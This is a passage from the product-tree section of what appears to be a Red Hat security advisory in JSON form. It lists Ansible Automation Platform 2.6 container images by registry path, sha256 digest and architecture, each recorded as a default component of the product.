"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
